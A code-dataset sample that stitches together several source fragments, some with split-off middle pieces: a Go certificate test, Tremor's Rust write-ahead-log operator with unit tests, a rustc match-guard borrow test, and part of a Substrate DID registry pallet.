ExtraExtensions: []pkix.Extension{
{
Id: []int{1, 2, 3, 4},
Value: extraExtensionData,
},
},
}
key, err := sm2.GenerateKey(rand.Reader)
assert.NoError(t, err)
certRaw, err := x509.CreateCertificate(rand.Reader, &template, &template, key.Public(), key)
assert.NoError(t, err)
cert, err := DERToX509Certificate(certRaw)
assert.NoError(t, err)
assert.NotNil(t, cert)
assert.Equal(t, cert.Raw, certRaw)
} | |
wal.rs | // Copyright 2020-2021, The Tremor Team
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use crate::{op::prelude::*, EventId, DEFAULT_STREAM_ID};
use byteorder::{BigEndian, ReadBytesExt};
use simd_json_derive::{Deserialize, Serialize};
use sled::IVec;
use std::io::Cursor;
use std::mem;
use std::ops::{Add, AddAssign};
use tremor_script::prelude::*;
#[derive(Clone, Copy, Default, PartialEq)]
struct Idx([u8; 8]);
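// The u64 is stored in big-endian byte order so that sled's lexicographic key
// ordering matches numeric ordering; this is what lets the `events_tree.range(..)`
// scans below iterate events in insertion order.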
#[cfg(not(tarpaulin_include))]
impl std::fmt::Debug for Idx {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "Idx({})", u64::from(self))
}
}
#[cfg(not(tarpaulin_include))]
impl std::fmt::Display for Idx {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", u64::from(self))
}
}
impl AddAssign<u64> for Idx {
fn add_assign(&mut self, other: u64) {
let this: u64 = u64::from(&*self);
self.0 = unsafe { mem::transmute((this + other).to_be()) };
}
}
impl Add<u64> for Idx {
type Output = Idx;
fn add(self, rhs: u64) -> Self::Output {
Idx::from(u64::from(&self) + rhs)
}
}
impl Add<usize> for Idx {
type Output = Idx;
fn add(self, rhs: usize) -> Self::Output {
Idx::from(u64::from(&self) + rhs as u64)
}
}
impl From<&Idx> for u64 {
fn from(i: &Idx) -> u64 {
let mut rdr = Cursor::new(&i.0);
rdr.read_u64::<BigEndian>().unwrap_or(0)
}
}
impl From<IVec> for Idx {
fn from(v: IVec) -> Self {
let mut rdr = Cursor::new(v);
let res: u64 = rdr.read_u64::<BigEndian>().unwrap_or(0);
Self(unsafe { mem::transmute(res.to_be()) })
}
}
impl From<u64> for Idx {
fn from(v: u64) -> Self {
Self(unsafe { mem::transmute(v.to_be()) })
}
}
impl Idx {
fn set(&mut self, v: u64) {
self.0 = unsafe { mem::transmute(v.to_be()) };
}
fn set_min(&mut self, v: u64) {
if v < u64::from(&*self) {
self.0 = unsafe { mem::transmute(v.to_be()) };
}
}
}
impl AsRef<[u8]> for Idx {
fn as_ref(&self) -> &[u8] {
&self.0
}
}
impl From<&Idx> for IVec {
fn from(i: &Idx) -> Self {
IVec::from(&i.0)
}
}
#[derive(Debug, Clone, Deserialize, serde::Deserialize, serde::Serialize)]
pub struct Config {
/// Maximum number of events to read per tick/event when filling
/// up from the persistent storage
pub read_count: usize,
/// The directory to store data in, if no dir is provided this will use
/// a temporary storage that won't persist over restarts
pub dir: Option<String>,
/// The maximum number of elements to store before breaking the circuit.
/// Note this is an approximation; we might store a few elements
/// above that to allow circuit breakers to kick in
pub max_elements: Option<u64>,
/// Maximum number of bytes the WAL is allowed to take on disk,
/// note this is a soft maximum and might be overshot slightly
pub max_bytes: Option<u64>,
/// Flush to disk on every write
flush_on_evnt: Option<bool>,
}
impl ConfigImpl for Config {}
#[derive(Debug, Clone)]
// TODO add seed value and field name as config items
/// A Write Ahead Log that will persist data to disk and feed the following operators from this disk
/// cache. It allows running onramps that do not provide any support for delivery guarantees with
/// offramps that do.
///
/// The wal operator will intercept and generate its own circuit breaker events. You can think of it
/// as a firewall that will protect all operators before itself from issues beyond it. On the other hand
/// it will indiscriminately consume data from sources and operators before itself until its own
/// circuit breaking conditions are met.
///
/// At the same time it will interact with tremor's guaranteed delivery system: events are only removed
/// from disk once they're acknowledged. In case of delivery failure the WAL operator will replay the
/// failed events. In the same way, the WAL operator will acknowledge events that it persists to disk.
///
/// The WAL operator should be used with caution: since every event that passes through it is
/// written to the hard drive, it has a significant performance impact.
pub struct Wal {
/// Elements currently in the event storage
cnt: u64,
/// general DB
wal: sled::Db,
/// event storage
events_tree: sled::Tree,
/// state storage (written, etc)
state_tree: sled::Tree,
/// Next read index
read: Idx,
/// The last confirmed (acknowledged) index
confirmed: Option<Idx>,
/// The configuration
config: Config,
/// Are we currently in a broken CB state
broken: bool,
/// Did we signal because we're full
full: bool,
/// ID of this operator
origin_uri: Option<EventOriginUri>,
}
op!(WalFactory(_uid, node) {
let map = node.config.as_ref().ok_or_else(|| ErrorKind::MissingOpConfig(node.id.to_string()))?;
let config: Config = Config::new(&map)?;
if config.max_elements.or(config.max_bytes).is_none() {
Err(ErrorKind::BadOpConfig("WAL operator needs at least one of `max_elements` or `max_bytes` config entries.".to_string()).into())
} else {
Ok(Box::new(Wal::new(node.id.to_string(), config)?))
}
});
impl Wal {
const URI_SCHEME: &'static str = "tremor-wal";
// tree names
const EVENTS: &'static str = "events";
const STATE: &'static str = "state";
// keys in the state tree
const CONFIRMED: &'static str = "confirmed";
fn new(id: String, config: Config) -> Result<Self> {
let wal = if let Some(dir) = &config.dir {
sled::open(&dir)?
} else {
sled::Config::default().temporary(true).open()?
};
let events_tree = wal.open_tree(Self::EVENTS)?;
let state_tree = wal.open_tree(Self::STATE)?;
#[allow(clippy::cast_possible_truncation)]
let confirmed = state_tree.get(Self::CONFIRMED)?.map(Idx::from);
let read = confirmed.unwrap_or_default();
Ok(Wal {
cnt: events_tree.len() as u64,
wal,
read,
confirmed,
events_tree,
state_tree,
config,
broken: true, // start in a broken CB state until a restore/open insight arrives
full: false,
origin_uri: Some(EventOriginUri {
uid: 0,
scheme: Self::URI_SCHEME.to_string(),
host: "pipeline".to_string(),
port: None,
path: vec![id],
}),
})
}
fn limit_reached(&self) -> Result<bool> {
let max_bytes = self.config.max_bytes.unwrap_or(u64::MAX);
let exceeds_max_bytes = self.wal.size_on_disk()? >= max_bytes;
Ok(self.config.max_elements.map_or(false, |me| self.cnt >= me) || exceeds_max_bytes)
}
fn read_events(&mut self, _now: u64) -> Result<Vec<(Cow<'static, str>, Event)>> {
// The maximum number of entries we read
let mut events = Vec::with_capacity(self.config.read_count as usize);
for (num_read, e) in self.events_tree.range(self.read..).enumerate() {
if num_read > self.config.read_count {
break;
}
let (idx, mut e) = e?;
self.read = idx.into();
self.read += 1;
let e_slice: &mut [u8] = &mut e;
let mut event = Event::from_slice(e_slice)?;
event.transactional = true;
events.push((OUT, event))
}
self.gc()?;
Ok(events)
}
fn store_event(&mut self, source_id: u64, mut event: Event) -> Result<()> {
let wal_id = self.wal.generate_id()?;
let write: [u8; 8] = unsafe { mem::transmute(wal_id.to_be()) };
// TODO: figure out if handling of separate streams makes sense here
let mut new_event_id = EventId::new(source_id, DEFAULT_STREAM_ID, wal_id);
new_event_id.track(&event.id);
event.id = new_event_id;
// Serialize and write the event
let event_buf = event.json_vec()?;
self.events_tree.insert(write, event_buf.as_slice())?;
if self.config.flush_on_evnt.unwrap_or_default() {
self.events_tree.flush()?;
}
self.cnt += 1;
Ok(())
}
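/// Garbage-collect the event tree: remove every persisted event up to and
/// including the last confirmed index and return how many entries were removed.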
fn gc(&mut self) -> Result<u64> {
let mut i = 0;
if let Some(confirmed) = self.confirmed {
for e in self.events_tree.range(..=confirmed) {
i += 1;
self.cnt -= 1;
let (idx, _) = e?;
self.events_tree.remove(idx)?;
}
}
Ok(i)
}
}
fn maybe_parse_ivec(e: Option<IVec>) -> Option<Event> {
let e_slice: &mut [u8] = &mut e?;
Event::from_slice(e_slice).ok()
}
impl Operator for Wal {
#[cfg(not(tarpaulin_include))]
fn handles_contraflow(&self) -> bool {
true
}
#[allow(clippy::option_if_let_else)] // borrow checker
fn on_contraflow(&mut self, u_id: u64, insight: &mut Event) |
#[cfg(not(tarpaulin_include))]
fn handles_signal(&self) -> bool {
true
}
fn on_signal(
&mut self,
_uid: u64,
_state: &Value<'static>,
signal: &mut Event,
) -> Result<EventAndInsights> {
let now = signal.ingest_ns;
// Are we currently full?
let now_full = self.limit_reached()?;
// If we just became full or we went from full to non full
// update the CB status
let insights = if self.full && !now_full {
warn!("WAL not full any more. {} elements.", self.cnt);
let mut e = Event::cb_restore(signal.ingest_ns);
e.origin_uri = self.origin_uri.clone();
vec![e]
} else if !self.full && now_full {
warn!("WAL full. {} elements.", self.cnt);
let mut e = Event::cb_trigger(signal.ingest_ns);
e.origin_uri = self.origin_uri.clone();
vec![e]
} else {
vec![]
};
self.full = now_full;
let events = if self.broken {
vec![]
} else {
self.read_events(now)?
};
Ok(EventAndInsights { events, insights })
}
fn on_event(
&mut self,
uid: u64,
_port: &str,
_state: &mut Value<'static>,
event: Event,
) -> Result<EventAndInsights> {
let id = event.id.clone();
let ingest_ns = event.ingest_ns;
let transactional = event.transactional;
let op_meta = if transactional {
Some(event.op_meta.clone())
} else {
None
};
self.store_event(uid, event)?;
let insights = if let Some(op_meta) = op_meta {
let mut insight = Event::cb_ack(ingest_ns, id);
insight.op_meta = op_meta;
vec![insight]
} else {
vec![]
};
let events = if self.broken {
Vec::new()
} else {
self.read_events(ingest_ns)?
};
Ok(EventAndInsights { events, insights })
}
}
#[cfg(test)]
mod test {
use crate::EventIdGenerator;
use crate::SignalKind;
use super::*;
use tempfile::Builder as TempDirBuilder;
#[test]
fn test_gc() -> Result<()> {
let c = Config {
read_count: 1,
dir: None,
max_elements: Some(10),
max_bytes: None,
flush_on_evnt: None,
};
let mut o = Wal::new("test".to_string(), c)?;
let wal_uid = 0_u64;
let source_uid = 42_u64;
let mut idgen = EventIdGenerator::new(source_uid);
// we start in a broken state
let id = idgen.next_id();
let mut e = Event::default();
let mut state = Value::null();
//send first event
e.id = id.clone();
e.transactional = true;
let mut op_meta = OpMeta::default();
op_meta.insert(42, OwnedValue::null());
e.op_meta = op_meta;
let mut r = o.on_event(wal_uid, "in", &mut state, e.clone())?;
assert_eq!(0, r.events.len());
assert_eq!(1, r.insights.len());
let insight = &r.insights[0];
assert_eq!(CbAction::Ack, insight.cb);
assert_eq!(1, o.cnt);
assert_eq!(None, o.confirmed);
// Restore the CB
let mut i = Event::cb_restore(0);
o.on_contraflow(wal_uid, &mut i);
// we have 1 event stored
assert_eq!(1, o.cnt);
assert_eq!(None, o.confirmed);
// send second event, expect both events back
let id2 = idgen.next_id();
e.id = id2.clone();
e.transactional = true;
let mut op_meta = OpMeta::default();
op_meta.insert(42, OwnedValue::null());
e.op_meta = op_meta;
r = o.on_event(wal_uid, "in", &mut state, e.clone())?;
assert_eq!(2, r.events.len());
assert!(
r.events[0].1.id.is_tracking(&id),
"not tracking the origin event"
);
assert!(
r.events[1].1.id.is_tracking(&id2),
"not tracking the origin event"
);
assert_eq!(1, r.insights.len());
let insight = &r.insights[0];
assert_eq!(CbAction::Ack, insight.cb);
// we have two events stored
assert_eq!(2, o.cnt);
assert_eq!(None, o.confirmed);
// acknowledge the first event
i = Event::cb_ack(e.ingest_ns, r.events[0].1.id.clone());
o.on_contraflow(wal_uid, &mut i);
// we still have two events stored
assert_eq!(2, o.cnt);
assert_eq!(Some(Idx::from(id.event_id())), o.confirmed);
// apply gc on signal
let mut signal = Event {
id: idgen.next_id(),
ingest_ns: 1,
kind: Some(SignalKind::Tick),
..Event::default()
};
let s = o.on_signal(wal_uid, &state, &mut signal)?;
assert_eq!(0, s.events.len());
assert_eq!(0, s.insights.len());
// now we have 1 left
assert_eq!(1, o.cnt);
assert_eq!(Some(Idx::from(id.event_id())), o.confirmed);
// acknowledge the second event
i = Event::cb_ack(e.ingest_ns, r.events[1].1.id.clone());
o.on_contraflow(wal_uid, &mut i);
// still 1 left
assert_eq!(1, o.cnt);
assert_eq!(Some(Idx::from(id2.event_id())), o.confirmed);
// apply gc on signal
let mut signal2 = Event {
id: idgen.next_id(),
ingest_ns: 1,
kind: Some(SignalKind::Tick),
..Event::default()
};
let s = o.on_signal(wal_uid, &state, &mut signal2)?;
assert_eq!(0, s.events.len());
assert_eq!(0, s.insights.len());
// we are clean now
assert_eq!(0, o.cnt);
assert_eq!(Some(Idx::from(id2.event_id())), o.confirmed);
Ok(())
}
#[test]
fn rw() -> Result<()> {
let c = Config {
read_count: 100,
dir: None,
max_elements: None,
max_bytes: Some(1024 * 1024),
flush_on_evnt: None,
};
let mut o = Wal::new("test".to_string(), c)?;
let wal_uid = 0_u64;
let source_uid = 42_u64;
let mut idgen = EventIdGenerator::new(source_uid);
let mut v = Value::null();
let mut e = Event::default();
e.id = idgen.next_id();
// The operator starts in a broken state
// Send a first event
let r = o.on_event(wal_uid, "in", &mut v, e.clone())?;
// Since we are broken we should get nothing back
assert_eq!(r.len(), 0);
assert_eq!(r.insights.len(), 0);
// Restore the CB
let mut i = Event::cb_restore(0);
o.on_contraflow(0, &mut i);
// Send a second event
e.id = idgen.next_id();
e.transactional = true;
let mut op_meta = OpMeta::default();
op_meta.insert(42, OwnedValue::null());
e.op_meta = op_meta;
let mut r = o.on_event(wal_uid, "in", &mut v, e.clone())?;
// Since we are restored we now get 2 events (1 and 2)
assert_eq!(r.len(), 2);
assert_eq!(r.insights.len(), 1); // we get an ack back
let insight = r.insights.pop().expect("no insight");
assert_eq!(insight.cb, CbAction::Ack);
assert!(insight.op_meta.contains_key(42));
assert!(!insight.op_meta.contains_key(wal_uid));
// extract the ids assigned by the WAL and tracked in the event ids
let id_e1 = r.events.first().map(|(_, event)| &event.id).unwrap();
let id_e2 = r.events.get(1).map(|(_, event)| &event.id).unwrap();
// Send a fail event back to the source through the WAL; this tells the WAL that delivery of
// 2 failed and it needs to be delivered again
let mut i = Event::default();
i.id = id_e2.clone();
i.cb = CbAction::Fail;
o.on_contraflow(0, &mut i);
// Send a third event
e.id = idgen.next_id();
e.transactional = false;
let r = o.on_event(0, "in", &mut v, e.clone())?;
// since we failed before we should see 2 events, 3 and the retransmit
// of 2
assert_eq!(r.len(), 2);
// Send a fail event back to the source for the first event; this will tell the WAL that delivery of
// 1, 2, 3 failed and they need to be delivered again
let mut i = Event::default();
i.id = id_e1.clone();
i.cb = CbAction::Fail;
o.on_contraflow(0, &mut i);
// since we failed before we should see 3 events the retransmit of 1-3
let r = o.on_signal(0, &v, &mut i)?;
assert_eq!(r.len(), 3);
o.gc()?;
Ok(())
}
#[test]
// tests that the wal works fine
// after a restart of the tremor server
fn restart_wal_regression() -> Result<()> {
let temp_dir = TempDirBuilder::new()
.prefix("tremor-pipeline-wal")
.tempdir()?;
let read_count = 100;
let c = Config {
read_count,
dir: Some(temp_dir.path().to_string_lossy().into_owned()),
max_elements: Some(10),
max_bytes: Some(1024 * 1024),
flush_on_evnt: None,
};
let mut v = Value::null();
let e = Event::default();
let wal_uid = 0;
{
// create the operator - first time
let mut o1 = WalFactory::new()
.from_node(wal_uid, &NodeConfig::from_config("wal-test-1", c.clone())?)?;
// Restore the CB
let mut i = Event::cb_restore(0);
o1.on_contraflow(wal_uid, &mut i);
// send a first event - not acked. so it lingers around in our WAL
let r = o1.on_event(1, "in", &mut v, e.clone())?;
assert_eq!(r.events.len(), 1);
assert_eq!(r.insights.len(), 0);
}
{
// create the operator - second time
// simulating a tremor restart
let mut o2 =
WalFactory::new().from_node(wal_uid, &NodeConfig::from_config("wal-test-2", c)?)?;
// Restore the CB
let mut i = Event::cb_restore(1);
o2.on_contraflow(wal_uid, &mut i);
// send a first event - not acked. so it lingers around in our WAL
let r = o2.on_event(wal_uid, "in", &mut v, e.clone())?;
assert_eq!(r.events.len(), 2);
let id1 = &r.events[0].1.id;
let id2 = &r.events[1].1.id;
assert_eq!(id1.get_max_by_stream(wal_uid, 0).unwrap(), 0);
// ensure we actually had a gap bigger than read count, which triggers the error condition
assert!(
id2.get_max_by_stream(wal_uid, 0).unwrap()
- id1.get_max_by_stream(wal_uid, 0).unwrap()
> read_count as u64
);
assert_eq!(r.insights.len(), 0);
let r = o2.on_event(wal_uid, "in", &mut v, e.clone())?;
assert_eq!(r.events.len(), 1);
}
Ok(())
}
#[test]
fn test_invalid_config() -> Result<()> {
let c = Config {
read_count: 10,
dir: None,
max_elements: None,
max_bytes: None,
flush_on_evnt: None,
};
let r = WalFactory::new().from_node(1, &NodeConfig::from_config("wal-test-1", c.clone())?);
assert!(r.is_err());
if let Err(Error(ErrorKind::BadOpConfig(s), _)) = r {
assert_eq!(
"WAL operator needs at least one of `max_elements` or `max_bytes` config entries.",
s.as_str()
);
}
Ok(())
}
#[test]
fn from() -> Result<()> {
assert_eq!(42, u64::from(&(Idx::from(40u64) + 2u64)));
assert_eq!(42, u64::from(&(Idx::from(40u64) + 2usize)));
Ok(())
}
#[test]
fn as_ref() -> Result<()> {
let i = Idx::from(42u64);
let s: &[u8] = i.as_ref();
assert_eq!(&[0, 0, 0, 0, 0, 0, 0, 42u8][..], s);
Ok(())
}
}
| {
match insight.cb {
CbAction::None => {}
CbAction::Open => {
debug!("WAL CB open.");
self.broken = false
}
CbAction::Close => {
debug!("WAL CB close");
self.broken = true
}
CbAction::Ack => {
let event_id =
if let Some((_stream_id, event_id)) = insight.id.get_max_by_source(u_id) {
event_id
} else {
// This is not for us
return;
};
trace!("WAL confirm: {}", event_id);
let confirmed = self.confirmed.get_or_insert_with(|| Idx::from(event_id));
confirmed.set(event_id);
if let Err(e) = self.state_tree.insert(Self::CONFIRMED, &*confirmed) {
error!("Failed to persist confirm state: {}", e);
}
if let Some(e) = self
.events_tree
.get(confirmed)
.ok()
.and_then(maybe_parse_ivec)
{
insight.id.track(&e.id);
}
}
CbAction::Fail => {
let event_id =
if let Some((_stream_id, event_id)) = insight.id.get_min_by_source(u_id) {
event_id
} else {
// This is not for us
return;
};
trace!("WAL fail: {}", event_id);
self.read.set_min(event_id);
if let Some(e) = self.confirmed.and_then(|confirmed| {
self.events_tree
.get(confirmed)
.ok()
.and_then(maybe_parse_ivec)
}) {
insight.id.track(&e.id);
}
let current_confirmed = self.confirmed.map(|v| u64::from(&v)).unwrap_or_default();
if event_id < current_confirmed {
warn!(
"trying to fail a message({}) that was already confirmed({})",
event_id, current_confirmed
);
// resetting confirmed to older event_id
let confirmed = Idx::from(event_id);
self.confirmed = Some(confirmed);
if let Err(e) = self.state_tree.insert(Self::CONFIRMED, &confirmed) {
error!("Failed to persist confirm state: {}", e);
}
}
}
}
insight.cb = CbAction::None;
} |
match-ref-mut-stability.rs | // Check that `ref mut` variables don't change address between the match guard
// and the arm expression.
// run-pass
#![feature(nll, bind_by_move_pattern_guards)]
// Test that z always points to the same temporary.
fn referent_stability() {
let p;
match 0 {
ref mut z if { p = z as *const _; true } => assert_eq!(p, z as *const _),
_ => unreachable!(),
};
}
// Test that z is always effectively the same variable.
fn | () {
let p;
match 0 {
ref mut z if { p = &z as *const _; true } => assert_eq!(p, &z as *const _),
_ => unreachable!(),
};
}
// Test that a borrow of *z can cross from the guard to the arm.
fn persist_borrow() {
let r;
match 0 {
ref mut z if { r = z as &_; true } => assert_eq!(*r, 0),
_ => unreachable!(),
}
}
fn main() {
referent_stability();
variable_stability();
persist_borrow();
}
| variable_stability |
lib.rs | #![cfg_attr(not(feature = "std"), no_std)]
extern crate alloc;
use alloc::{format, str, string::*};
use codec::{Decode, Encode};
/// Edit this file to define custom logic or remove it if it is not needed.
/// Learn more about FRAME and the core library of Substrate FRAME pallets:
/// https://substrate.dev/docs/en/knowledgebase/runtime/frame
use frame_support::{decl_error, decl_event, decl_module, decl_storage, dispatch, ensure};
use frame_system::ensure_signed;
use sp_std::vec::Vec;
#[cfg(test)]
mod mock;
#[cfg(test)]
mod tests;
/// Configure the pallet by specifying the parameters and types on which it depends.
pub trait Trait: frame_system::Trait + pallet_timestamp::Trait {
/// Because this pallet emits events, it depends on the runtime's definition of an event.
type Event: From<Event<Self>> + Into<<Self as frame_system::Trait>::Event>;
}
const VALID: u8 = 0;
const DEACTIVE: u8 = 1;
#[derive(Encode, Decode, Default)]
pub struct PkList<A> {
pk_list: Vec<Pk<A>>,
}
impl<A: core::cmp::Eq> PkList<A> {
pub fn new_default(controller: Vec<u8>, acc: A) -> Self {
let mut l = Vec::new();
l.push(Pk::new_acc_and_auth(controller, acc));
PkList { pk_list: l }
}
pub fn contains(&self, acc: &A) -> bool {
for v in self.pk_list.iter() {
if &v.public_key == acc {
return true;
}
}
return false;
}
pub fn have_access(&self, acc: &A) -> bool {
for v in self.pk_list.iter() {
if &v.public_key == acc {
if v.deactivated == false && v.is_authentication == true {
return true;
}
}
}
return false;
}
pub fn push(&mut self, account_id: Pk<A>) {
self.pk_list.push(account_id);
}
pub fn deactivate_acc(&mut self, acc: &A) {
for v in self.pk_list.iter_mut() {
if &v.public_key == acc {
v.deactivated = true;
return;
}
}
return;
}
pub fn set_acc_auth(&mut self, acc: &A) {
for v in self.pk_list.iter_mut() {
if &v.public_key == acc {
v.is_authentication = true;
return;
}
}
return;
}
pub fn remove_acc_auth(&mut self, acc: &A) {
for v in self.pk_list.iter_mut() {
if &v.public_key == acc {
v.is_authentication = false;
return;
}
}
return;
}
pub fn find_acc(&self, acc: &A) -> Option<u32> {
for (index, v) in self.pk_list.iter().enumerate() {
if &v.public_key == acc {
return Some(index as u32);
}
}
return None;
}
pub fn | (&self) -> u32 {
self.pk_list.len() as u32
}
}
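// Hypothetical usage sketch (the account value is an assumption, not from this file):
//
//     let mut keys = PkList::new_default(b"did:example:alice".to_vec(), alice.clone());
//     assert!(keys.have_access(&alice));
//     keys.deactivate_acc(&alice);
//     assert!(!keys.have_access(&alice));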
impl<A: core::convert::AsRef<[u8]> + core::cmp::Eq> PkList<A> {
pub fn to_json(&self, did: &Vec<u8>) -> Vec<PkJson> {
let mut result = Vec::new();
for (i, v) in self.pk_list.iter().enumerate() {
if !v.is_pk_list {
continue;
}
let tp: String = "".to_string();
// match v.public_key[0] {
// 0 => tp = KeyType::Ed25519VerificationKey2018.to_string(),
// 1 => tp = KeyType::EcdsaSecp256k1VerificationKey2019.to_string(),
// _ => {}
// }
let pk_json = PkJson {
id: format!("{}#keys-{}", str::from_utf8(did).ok().unwrap(), i + 1),
tp,
controller: str::from_utf8(&v.controller).ok().unwrap().to_string(),
public_key_hex: format!("{:x?}", v.public_key.as_ref()),
};
result.push(pk_json);
}
result
}
pub fn to_authentication_json(
&self,
did: &Vec<u8>,
authentication_list: Vec<u32>,
) -> Vec<AuthenticationJson> {
let mut result = Vec::new();
for i in authentication_list.iter() {
let public_key: &Pk<A> = self.pk_list.get(*i as usize).unwrap();
if public_key.is_pk_list {
let authentication = AuthenticationJson::Pk(format!(
"{}#keys-{}",
str::from_utf8(did).ok().unwrap(),
i + 1
));
result.push(authentication);
} else {
let tp: String = "".to_string();
// match public_key.public_key[0] {
// 0 => tp = KeyType::Ed25519VerificationKey2018.to_string(),
// 1 => tp = KeyType::EcdsaSecp256k1VerificationKey2019.to_string(),
// _ => {}
// }
let authentication = AuthenticationJson::NotPK(PkJson {
id: format!("{}#keys-{}", str::from_utf8(did).ok().unwrap(), i + 1),
tp,
controller: str::from_utf8(&public_key.controller)
.ok()
.unwrap()
.to_string(),
public_key_hex: format!("{:x?}", public_key.public_key.as_ref()),
});
result.push(authentication);
}
}
result
}
}
#[derive(Encode, Decode, Default)]
pub struct Pk<A> {
controller: Vec<u8>,
public_key: A,
deactivated: bool,
is_pk_list: bool,
is_authentication: bool,
}
impl<A> Pk<A> {
pub fn new_acc_and_auth(controller: Vec<u8>, acc: A) -> Self {
Pk {
controller,
public_key: acc,
deactivated: false,
is_pk_list: true,
is_authentication: true,
}
}
pub fn new_acc(controller: Vec<u8>, acc: A) -> Self {
Pk {
controller,
public_key: acc,
deactivated: false,
is_pk_list: true,
is_authentication: false,
}
}
pub fn new_auth(controller: Vec<u8>, acc: A) -> Self {
Pk {
controller,
public_key: acc,
deactivated: false,
is_pk_list: false,
is_authentication: true,
}
}
}
#[derive(Encode, Decode, Default)]
pub struct Service {
id: Vec<u8>,
tp: Vec<u8>,
service_endpoint: Vec<u8>,
}
impl Service {
pub fn to_json(&self) -> ServiceJson {
ServiceJson {
id: str::from_utf8(&self.id).ok().unwrap().to_string(),
tp: str::from_utf8(&self.tp).ok().unwrap().to_string(),
service_endpoint: str::from_utf8(&self.service_endpoint)
.ok()
.unwrap()
.to_string(),
}
}
}
pub struct PkJson {
id: String,
tp: String,
controller: String,
public_key_hex: String,
}
pub struct ServiceJson {
id: String,
tp: String,
service_endpoint: String,
}
pub enum AuthenticationJson {
Pk(String),
NotPK(PkJson),
}
pub struct Document<A> {
pub contexts: Vec<String>,
pub id: String,
pub public_key: Vec<PkJson>,
pub authentication: Vec<AuthenticationJson>,
pub controller: Vec<String>,
pub service: Vec<ServiceJson>,
pub created: A,
pub updated: A,
}
// The pallet's runtime storage items.
// https://substrate.dev/docs/en/knowledgebase/runtime/storage
decl_storage! {
// A unique name is used to ensure that the pallet's storage items are isolated.
// This name may be updated, but each pallet in the runtime must use a unique name.
// ---------------------------------vvvvvvvvvvvvvv
trait Store for Module<T: Trait> as DID {
// Learn more about declaring storage items:
// https://substrate.dev/docs/en/knowledgebase/runtime/storage#declaring-storage-items
pub StatusStore: map hasher(blake2_128_concat) Vec<u8> => u8;
pub ContextStore: map hasher(blake2_128_concat) Vec<u8> => Vec<Vec<u8>> = Vec::new();
pub PkListStore: map hasher(blake2_128_concat) Vec<u8> => PkList<T::AccountId>;
pub AuthenticationStore: map hasher(blake2_128_concat) Vec<u8> => Vec<u32> = Vec::new();
pub ControllerStore: map hasher(blake2_128_concat) Vec<u8> => Vec<Vec<u8>> = Vec::new();
pub ServiceStore: map hasher(blake2_128_concat) Vec<u8> => Vec<Service> = Vec::new();
pub CreatedStore: map hasher(blake2_128_concat) Vec<u8> => T::Moment;
pub UpdatedStore: map hasher(blake2_128_concat) Vec<u8> => T::Moment;
}
}
// Pallets use events to inform users when important changes are made.
// https://substrate.dev/docs/en/knowledgebase/runtime/events
decl_event!(
pub enum Event<T>
where
AccountId = <T as frame_system::Trait>::AccountId,
{
/// Event documentation should end with an array that provides descriptive names for event
/// parameters.
RegisterWithAccount(Vec<u8>, AccountId),
DeactivateDid(Vec<u8>),
AddController(Vec<u8>, Vec<u8>),
RemoveController(Vec<u8>, Vec<u8>),
AddKey(Vec<u8>, AccountId, Vec<u8>),
DeactivateKey(Vec<u8>, AccountId),
AddNewAuthKey(Vec<u8>, AccountId, Vec<u8>),
SetAuthKey(Vec<u8>, AccountId),
DeactivateAuthKey(Vec<u8>, AccountId),
AddNewAuthKeyByController(Vec<u8>, AccountId, Vec<u8>),
SetAuthKeyByController(Vec<u8>, AccountId),
DeactivateAuthKeyByController(Vec<u8>, AccountId),
AddService(Vec<u8>, Vec<u8>, Vec<u8>, Vec<u8>),
UpdateService(Vec<u8>, Vec<u8>, Vec<u8>, Vec<u8>),
RemoveService(Vec<u8>, Vec<u8>),
AddContext(Vec<u8>, Vec<u8>),
RemoveContext(Vec<u8>, Vec<u8>),
VerifySignature(Vec<u8>),
VerifyController(Vec<u8>, Vec<u8>),
}
);
// Errors inform users that something went wrong.
decl_error! {
pub enum Error for Module<T: Trait> {
/// Error names should be descriptive.
AlreadyRegistered,
/// Errors should have helpful documentation associated with them.
NotRegistered,
Invalid,
NoAccess,
ControllerExist,
ControllerNotExist,
AccountIdExist,
AccountIdNotExist,
AccountIdDeactivated,
ServiceExist,
ServiceNotExist,
ContextExist,
ContextNotExist,
}
}
// Dispatchable functions allow users to interact with the pallet and invoke state changes.
// These functions materialize as "extrinsics", which are often compared to transactions.
// Dispatchable functions must be annotated with a weight and must return a DispatchResult.
decl_module! {
pub struct Module<T: Trait> for enum Call where origin: T::Origin {
// Errors must be initialized if they are used by the pallet.
type Error = Error<T>;
// Events must be initialized if they are used by the pallet.
fn deposit_event() = default;
		/// Registers a new DID, storing the caller's account as its default public key.
		/// This function must be dispatched by a signed extrinsic.
#[weight = 0]
pub fn reg_did_using_account(origin, did: Vec<u8>) -> dispatch::DispatchResult {
// Check that the extrinsic was signed and get the signer.
// This function will return an error if the extrinsic is not signed.
// https://substrate.dev/docs/en/knowledgebase/runtime/origin
let sender = ensure_signed(origin)?;
			// Verify that the specified DID has not already been registered.
ensure!(!StatusStore::contains_key(&did), Error::<T>::AlreadyRegistered);
// Update storage.
StatusStore::insert(&did, VALID);
<PkListStore<T>>::insert(&did, PkList::<T::AccountId>::new_default(did.clone(), sender.clone()));
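			// The default key sits at index 0 of the key list and is usable for authentication from the start.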
let mut a = Vec::new();
a.push(0);
AuthenticationStore::insert(&did, a);
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<CreatedStore<T>>::insert(&did, now_timestamp);
// Emit an event.
Self::deposit_event(RawEvent::RegisterWithAccount(did, sender));
// Return a successful DispatchResult
Ok(())
}
#[weight = 0]
pub fn deactivate_did(origin, did: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
// Update storage.
StatusStore::insert(&did, DEACTIVE);
ContextStore::remove(&did);
<PkListStore<T>>::remove(&did);
AuthenticationStore::remove(&did);
ControllerStore::remove(&did);
ServiceStore::remove(&did);
<CreatedStore<T>>::remove(&did);
<UpdatedStore<T>>::remove(&did);
Self::deposit_event(RawEvent::DeactivateDid(did));
Ok(())
}
#[weight = 0]
